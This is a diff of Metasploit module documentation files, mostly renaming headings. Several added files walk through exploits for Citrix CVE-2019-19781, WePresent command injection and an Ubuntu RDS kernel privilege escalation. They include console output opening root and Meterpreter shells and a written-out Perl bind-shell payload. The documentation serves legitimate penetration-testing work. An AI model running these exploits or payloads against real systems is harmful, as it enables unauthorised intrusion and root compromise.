+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085
@@ -1,15 +1,11 @@
-## Description
+## Vulnerable Application
+
  This module attempts to authenticate against a Wordpress-site (via 
  XMLRPC) using username and password combinations indicated by the 
  `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.

-## References
-* [https://codex.wordpress.org/XML-RPC_Support](https://codex.wordpress.org/XML-RPC_Support)
-* [http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/](http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/)
-
-## Vulnerable Application
-
 ### Setup using Docksal
+
 Install [Docksal](https://docksal.io/)

 Create a new WordPress installation using `fin project create`
@@ -4,7 +4,7 @@ Exchange installations to enumerate email.

 Error-based user enumeration for Office 365 integrated email addresses

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/exchange_enum`
@@ -11,7 +11,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/host_id`
@@ -6,7 +6,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/onprem_enum`
@@ -13,7 +13,7 @@ Detects a closed port via a RST received in response to the FIN
  XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
  systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

-# Options
+## Options

  **PORTS**
  
@@ -34,7 +34,7 @@ Detects a closed port via a RST received in response to the FIN
  Gives detailed message about the scan of all the ports. It also shows the
  ports that were not open/filtered.

-# Verification Steps
+## Verification Steps

  1. Do: `use auxiliary/scanner/portscan/xmas`
  2. Do: `set RHOSTS [IP]`
@@ -42,7 +42,7 @@ Detects a closed port via a RST received in response to the FIN
  4. Do: `run`
  5. The open/filtered ports will be discovered, status will be printed indicating as such.

-# Scenarios
+## Scenarios
  
 ### Metaspliotable 2

@@ -57,7 +57,7 @@ IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(profinet_siemens) > show options

@@ -31,7 +31,7 @@ Currently supported objects are:
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/dcomexec) > show options 
@@ -9,7 +9,7 @@
 1. Set: `RHOSTS`, `SMBUser`, `SMBPass`
 1. Do: `run`, see hashes from the remote machine

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 
@@ -18,7 +18,7 @@
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 
@@ -7,7 +7,7 @@ Cambium cnPilot r200/r201 devices can be administered using SNMP. The device con
 3. Do: ```set COMMUNITY public```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
@@ -11,7 +11,7 @@ Note: If the backup url is not retrieved, it is recommended to increase the TIME
 3. Do: ```set COMMUNTY [SNMP_COMMUNUTY_STRING]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/epmp_snmp_loot
@@ -1,6 +1,6 @@
 Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.

-## Vulnerable Applications
+## Vulnerable Application

 * F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
 * Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)
@@ -12,7 +12,7 @@ The following versions of SenNet Data Logger and Electricity Meters, monitoring
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/telnet/satel_cmd_exec
@@ -1,7 +1,7 @@
 Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and
 feel different for you. Here are the features you should know about before using.

-## Vulnerable Applications
+## Vulnerable Application

 Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 This module exploits a SQLi vulnerability found in
 OpenEMR version 5.0.1 Patch 6 and lower. The
@@ -10,18 +10,6 @@ This module saves each table as a `.csv` file in your
 loot directory and has been tested with
 OpenEMR 5.0.1 (3).

-
-## Author
-
-Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security
-
-
-## References
-
-https://www.cvedetails.com/cve/CVE-2018-17179/
-https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617
-
-
 ## Options

 ```
@@ -39,7 +27,7 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
   VHOST                       no        HTTP server virtual host
 ```

-## Usage
+## Scenarios

 This module has both `check` and `run` functions.

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module uses the su binary present on rooted devices to run a payload as root.

@@ -8,12 +8,10 @@ temporary directory, make it executable, execute it in the background, and final

 On most devices the su binary will pop-up a prompt on the device asking the user for permission.

-## Vulnerable Application
-
 This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
 Many devices can be rooted by flashing new firmware, however the existing data will be lost.

-## Verfication steps
+## Scenarios

 You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)

@@ -35,7 +35,7 @@ Change dictory to CVE-2017-1263X, and run `docker-compose up -d`
  9. Do: ``exploit``
  10. You should get a shell.

-## Options   
+## Options

 - URIPATH

@@ -40,28 +40,34 @@ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2
 ## Options

 **RHOSTS**
+
 Configure the remote vulnerable system.

 **RPORT**
+
 Configure the TCP port of the HTTP/HTTPS management web interface.

 **USE_SSL**
+
 This flag controls whether the remote management web interface is accessible
 via HTTPS or not. Should be false for HTTP and true for HTTPS.

 **PAYLOAD**
+
 Configure the Metasploit payload that you want to stage. Must be for MIPS64
 arch.  Set payload Options accordingly.

 **SRVHOST**
+
 The module stages the payload via a web server. This is the binding interface
 IP. Default can be set to 0.0.0.0. 

 **HTTPDelay**
+
 This configures how long the module should wait for the incoming HTTP
 connection to the HTTP stager.

-## Verification Steps:
+## Verification Steps

 1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
 2. Start `msfconsole`:
@@ -74,7 +80,7 @@ connection to the HTTP stager.
 9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.


-## Scenario
+## Scenarios

 Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
 interface on TCP port 443: 
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 The Cisco UCS Director virtual appliance contains two flaws that can be combined
 and abused by an attacker to achieve remote code execution as root.
@@ -16,21 +16,7 @@ Note that Cisco also mentions in their advisory that their IMC Supervisor and
 UCS Director Express are also affected by these vulnerabilities, but this module
 was not tested with those products.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
-FULL_DISC
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
-
-
-## Usage
+## Scenarios

 Setup RHOST, LHOST, LPORT and run it!

@@ -0,0 +1,76 @@
+## Introduction
+
+A directory traversal was discovered in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.
+
+When the NSPPE receives a request for `GET /vpn/index.html`, it is supposed to send this request to Apache, which processes it. However, by making the request `GET /vpn/../vpns/` (which is not sanitized), Apache transforms the route into `GET /vpns/` and processes this last request normally.
+
+This `/vpns/` directory is interesting because it contains Perl code. The script `newbm.pl` creates an array containing information from several parameters, then calls the `filewrite` function, which writes the content to an XML file on disk.
+
+A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload.
+
+```
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
+[*] Generated payload: id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+
+[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
+[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
+payload => cmd/unix/bind_perl
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
+[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
+[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
+[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
+[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2
+
+id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+```
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/citrix_dir_traversal_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set LHOST [IP]`
+6. Do: `set VERBOSE true`
+7. Do: `run`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Python
+1   Unix Command
+```
+
+## Advanced options
+
+**ForceExploit**
+
+Override check result.
+
+## References
+
+1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
+2. <https://www.exploit-db.com/exploits/47901>
+3. <https://www.exploit-db.com/exploits/47902>
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
@@ -155,7 +155,7 @@ in the DCOS cluster.
 - [ ] Verify it creates a docker container and it successfully runs
 - [ ] After a minute a session should be opened from the agent server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/dcos_marathon
 msf exploit(dcos_marathon) > set RHOST 192.168.0.9
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
 with tls but without tls-auth), an attacker can create a Docker
 container with the '/' path mounted with read/write permissions on the
@@ -85,7 +85,7 @@ to gain root access to the hosting server of the Docker container.
 - [ ] Verify it creates a Docker container and it successfully runs
 - [ ] After a minute a session should be opened from the Docker server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/docker_daemon_tcp
 msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23
@@ -10,7 +10,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```

-## Sample Output
+## Scenarios

  ```
 msf > use use exploit/unix/http/epmp1000_get_chart_cmd_shell
@@ -12,7 +12,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```

-## Sample Output
+## Scenarios

  ```
 msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
@@ -9,7 +9,7 @@ Refer to: https://www.exploit-db.com/exploits/36807/

 NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well).  This can cause bind payloads to quietly fail.  For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - Do `use exploit/linux/http/goautodial_3_rce_command_injection`
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application

 Nagios XI 5.5.6 Root Remote Code Execution

@@ -14,7 +14,7 @@ The exploit works as follows:
 - Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
 - Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).

-# Verification Steps
+## Verification Steps

 1. `use exploit/linux/http/nagios_xi_root_rce`
 2. `set RHOSTS [IP]`
@@ -23,7 +23,7 @@ The exploit works as follows:

 A meterpreter session should have been opened successfully and you should be root

-# Options
+## Options

 ## RSRVHOST

@@ -41,7 +41,7 @@ IP of your local HTTPS server (must be a local IP).

 Port to listen to for your local HTTPS server.

-# Scenarios
+## Scenarios

 ## Nagios 5.5.6 on Ubuntu 18.04 LTS

@@ -13,7 +13,7 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
  5. Do : `run`
  6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session

-## Scenarious
+## Scenarios

 Sample output of a successfull exploitation should be look like this :

@@ -1,4 +1,4 @@
-## Background
+## Vulnerable Application

 The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
 pre-authorized CSS files, which allows the attacker to bypass
@@ -9,7 +9,7 @@ This exploit uses a utility function in
 /components/system/configuration/functions.php to execute commands once
 authorization has been bypassed.

-## Verification
+## Verification Steps

 This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
 default options are generally effective due to having a set state after being
@@ -1,4 +1,4 @@
-## Background
+## Vulnerable Application

 This module uses a challenge solver exploit which impacts two possible states
 of the device: pre-password set and post-password set. The pre-password set
@@ -16,7 +16,7 @@ This exploit uses a utility function in
 /components/system/configuration/functions.php to execute commands once
 authorization has been bypassed.

-## Verification
+## Verification Steps

 This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
 default options are generally effective due to having a set state after being
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Rancher Server, an attacker can create a docker container
 with the '/' path mounted with read/write permissions on the host
 server that is running the docker container. As the docker container
@@ -107,7 +107,7 @@ Advanced Options
 - [ ] Verify it creates a docker container and it successfully runs 
 - [ ] After a minute a session should be opened from the agent server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/rancher_server
 msf exploit(rancher_server) > set RHOST 192.168.91.111
@@ -47,7 +47,7 @@ Samsung NVR Recorder SRN-1670D is a hardware:

 http://www.samsungcc.com.au/cctv/ip-nvr-solution/samsung-dvr-srn-1670d

-## Scenario
+## Scenarios

 ```
 msf exploit(samsung_srv_1670d_upload_exec) > show options 
@@ -3,7 +3,7 @@
 This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
 It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

-## Vulnerable Application 
+## Verification Steps

 https://github.com/vulhub/vulhub/tree/master/spark/unacc 

@@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation.
 ## Usage

 ```
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run

 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -95,9 +95,9 @@ uname -a
 Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ^Z
 Background session 1? [y/N]  y
-msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
+msf5 exploit(linux/http/webmin_backdoor) > set target 1
 target => 1
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run

 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+This module exploits [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability affects [WePresent](https://www.barco.com/en/page/wepresent) devices, as well as many OEM devices (listed below). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the /cgi-bin/file_transfer.cgi endpoint. 
+
+The following devices are known to be affected by this issue:
+
+* Barco wePresent WiPG-1000P <= 2.3.0.10
+* Barco wePresent WiPG-1600W <= 2.4.1.19
+* Crestron AM-100 <= 1.6.0.2
+* Crestron AM-101 <= 2.7.0.1
+* Extron ShareLink 200/250 <= 2.0.3.4
+* Teq AV IT WIPS710 <= 1.1.0.7
+* InFocus LiteShow3 <= 1.0.16
+* InFocus LiteShow4 <= 2.0.0.7
+* Optoma WPS-Pro <= 1.0.0.5
+* Blackbox HD WPS <= 1.0.0.5
+* SHARP PN-L703WA <= 1.4.2.3
+
+## Verification Steps
+
+  1. Acquire one of the vulnerable devices.
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/wepresent_cmd_injection`
+  4. Do: `set RHOSTS <device ip>`
+  5. Do: `check`
+  6. The module should indicate if the target is vulnerable or not.
+  7. Do: `set LHOST <ip>`
+  8. Do: run
+  9. A meterpreter session should be started
+
+## Scenarios
+
+### Tested against Crestron AM-100 1.6.0.2 
+
+#### Meterpreter
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.12.70.238:4444 
+[*] Command Stager progress -   9.95% done (127/1276 bytes)
+[*] Command Stager progress -  19.98% done (255/1276 bytes)
+[*] Command Stager progress -  29.94% done (382/1276 bytes)
+[*] Command Stager progress -  39.97% done (510/1276 bytes)
+[*] Command Stager progress -  50.00% done (638/1276 bytes)
+[*] Command Stager progress -  59.95% done (765/1276 bytes)
+[*] Command Stager progress -  69.75% done (890/1276 bytes)
+[*] Command Stager progress -  79.62% done (1016/1276 bytes)
+[*] Command Stager progress -  89.50% done (1142/1276 bytes)
+[*] Sending stage (904600 bytes) to 10.12.70.246
+[*] Command Stager progress - 100.08% done (1277/1276 bytes)
+[*] Command Stager progress - 101.33% done (1293/1276 bytes)
+[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500
+
+meterpreter > shell
+Process 31774 created.
+Channel 1 created.
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+```
+
+#### Busybox/Telnetd Bind Shell
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd 
+payload => cmd/unix/bind_busybox_telnetd
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started bind TCP handler against 10.12.70.246:4444
+[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500
+
+whoami
+whoami
+root
+~/boa/cgi-bin # uname -a
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+~/boa/cgi-bin # 
+```
+
@@ -1,8 +1,10 @@
-## Description
+## Vulnerable Application

-This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
+This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute
+a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root.
+It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.

-## Demo
+## Scenarios

 ```
 msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
@@ -19,4 +21,3 @@ meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
 meterpreter > 
 ```
-
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application

 Exim 4.87 - 4.91 Local Privilege Escalation

@@ -15,7 +15,7 @@ Be careful if you use the exim package from the official repo of your Linux dist

 Before using the exploit, make sure exim is actually listening on a port (it may sound stupid, but I struggled a bit when creating a testing environment). However, you should not have any problem if you use the Docker image linked above.

-# Verification Steps
+## Verification Steps

 1. `use exploit/linux/local/exim4_deliver_message_priv_esc`
 2. `set SESSION [session]`
@@ -24,7 +24,7 @@ Before using the exploit, make sure exim is actually listening on a port (it may
 5. `set LPORT [lport]`
 6. `exploit`

-# Options
+## Options

 ## PAYLOAD

@@ -47,7 +47,7 @@ Timeout per send/expect when communicating with exim.
 A directory where we can write files (default is /tmp).


-# Scenarios
+## Scenarios

 ## Privilege escalation starting with a meterpreter shell

@@ -0,0 +1,129 @@
+## Description
+
+  This module attempts to gain root privileges on Linux systems by abusing
+  a NULL pointer dereference in the `rds_atomic_free_op` function in the
+  Reliable Datagram Sockets (RDS) kernel module (rds.ko).
+
+  Successful exploitation requires the RDS kernel module to be loaded.
+  If the RDS module is not blacklisted (default); then it will be loaded
+  automatically.
+
+  This exploit supports 64-bit Ubuntu Linux systems, including distributions
+  based on Ubuntu, such as Linux Mint and Zorin OS.
+
+  Target offsets are available for:
+
+  Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
+  Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.
+
+  This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
+  Failed exploitation may crash the kernel.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on various 4.4 and 4.8 kernels.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+  **COMPILE**
+
+  Options: `Auto` `True` `False` (default: `Auto`)
+
+  Whether the exploit should be live compiled with `gcc` on the target system,
+  or uploaded as a pre-compiled binary.
+
+  `Auto` will first determine if `gcc` is installed to compile live on the system,
+  and fall back to uploading a pre-compiled executable.
+
+
+## Scenarios
+
+### Ubuntu 16.04 kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu
+
+  ```
+  msf5 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc 
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check
+
+  [+] System architecture x86_64 is supported
+  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
+  [+] SMAP is not enabled
+  [+] LKRG is not installed
+  [+] grsecurity is not in use
+  [+] rds.ko kernel module is loaded
+  [*] The target appears to be vulnerable.
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] System architecture x86_64 is supported
+  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
+  [+] SMAP is not enabled
+  [+] LKRG is not installed
+  [+] grsecurity is not in use
+  [+] rds.ko kernel module is loaded
+  [+] gcc is installed
+  [*] Live compiling exploit on system...
+  [*] Writing '/tmp/.zwl2ezPl' (250 bytes) ...
+  [*] Launching exploit (timeout: 30)...
+  [*] Transmitting intermediate stager...(126 bytes)
+  [*] Sending stage (3021284 bytes) to 172.16.191.206
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.206:48130) at 2019-12-21 02:22:40 -0500
+  [+] Deleted /tmp/.aCNiWb9vps
+  [+] Deleted /tmp/.zwl2ezPl
+  [*] Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+  [*] [.] checking kernel version...
+  [*] [.] kernel version '4.8.0-51-lowlatency #54~16.04.1-Ubuntu' detected
+  [*] [~] done, version looks good
+  [*] [.] checking system...
+  [*] [~] done, looks good
+  [*] [.] mapping null address...
+  [*] [~] done, mapped null address
+  [*] [.] KASLR bypass enabled, getting kernel base address
+  [*] [.] trying /proc/kallsyms...
+  [*] [-] kernel base not found in /proc/kallsyms
+  [*] [.] trying syslog...
+  [*] [.] done, kernel text:   ffffffffa7c00000
+  [*] [.] commit_creds:        ffffffffa7ca6ed0
+  [*] [.] prepare_kernel_cred: ffffffffa7ca72e0
+  [*] [.] mmapping fake stack...
+  [*] [~] done, fake stack mmapped
+  [*] [.] executing payload 0x4027f7...
+  [*] [+] got root
+
+  meterpreter > getuid 
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.206
+  OS           : Ubuntu 16.04 (Linux 4.8.0-51-lowlatency)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+
@@ -17,7 +17,7 @@ docker pull redis
 docker run -p 6379:6379 -d --name redis_slave redis
 ```

-## Options   
+## Options

 - CUSTOM

@@ -1,11 +1,9 @@
-## Description
+## Vulnerable Application

 This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to `ftpfw.sh` system command, leading to command injection.

 Note: a valid SNMP read-write community is required to exploit this vulnerability.

-## Vulnerable Devices
-
 The following devices are known to be affected by this issue:

 * Crestron Airmedia AM-100 <= version 1.5.0.4
@@ -18,7 +16,7 @@ The following devices are known to be affected by this issue:
